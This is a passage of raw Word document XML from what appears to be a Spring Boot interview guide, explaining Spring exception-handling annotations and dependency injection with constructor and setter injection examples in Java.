          <w:p w14:paraId="3729A590" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@ResponseStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53C149A5" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Map custom exceptions to status codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="008A3BB7" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1056DF" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ErrorController</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19E1A52C" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Customize Spring Boot default error page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52218DD5" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="003F4D05">
          <v:rect id="_x0000_i2052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBACDE" w14:textId="35F27BE5" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="_Toc196307905"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidR="00265B92" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DI)? How is it implemented in Spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w14:paraId="0CC4C51A" w14:textId="6856ACA1" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="003A4274">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pendency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a design pattern in which an object’s dependencies are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>injected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by an external framework rather than the object creating them itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA3109" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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In simple terms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8281F" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00397481">
      <w:pPr>
        <w:ind w:firstLine="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stead of EmployeeService creating its own EmployeeRepository, Spring injects it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB7FEDC" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD56E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65D9522">
          <v:rect id="_x0000_i2053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B91057" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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y Use Dependency Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4D251" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Promotes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loose coupling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F538CE" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Makes code more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>testable</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maintainable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47910656" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Follows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inversion of Control (IoC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ACE05E" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD56E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2EE7CE">
          <v:rect id="_x0000_i2054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="002848CC" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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How Spring Implements Dependency Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D7B00" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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supports two main types of D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0"/>
        <w:gridCol w:w="3921"/>
      </w:tblGrid>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="35638AFF" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE46E03" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00FF20B2">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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625D6E76" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00FF20B2">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05728C" w:rsidRPr="00CE4B95" w14:paraId="242E7E64" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D82237" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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nstructor DI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA5800E" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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pendencies are provided via constructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="22D19141" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B38BFC" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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tter DI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="510E0B3A" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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pendencies are set via setters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CBE34A4" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD56E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57FBB5A">
          <v:rect id="_x0000_i2055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F6631B" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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 Constructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F80F4"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB2F187"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Repository</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4E87633"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getDat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50B582D"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Employee Data"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F425B11"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FAC4ECD"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057EE15"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68556CC6"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303ADD45"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Servic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D4764C6"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F1EF6D"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inal</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Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> repo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7AE6DD"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F783F4"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DEF0C"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Service</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EmployeeRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rep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9187D2C"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repo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epo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86C457"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C27491E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D0C7F"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showDat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D451CB4"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p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Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B2AE9"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5AB6731" w14:textId="3B615E99"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22085985" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example – Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6429E791"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A595B2"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DepartmentRepository</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96C9659"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getDepartme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5D08F27"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IT Department"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D109532"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0388AB0"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D4E83"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929E9DB"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FD507A"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DepartmentServic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C050A98"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187464DA"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DepartmentRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> repo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444DCDF2"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E29314"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31621F"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setRepo</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DepartmentRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rep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38E22D7"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i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repo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epo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB7B4E"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5163A13"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
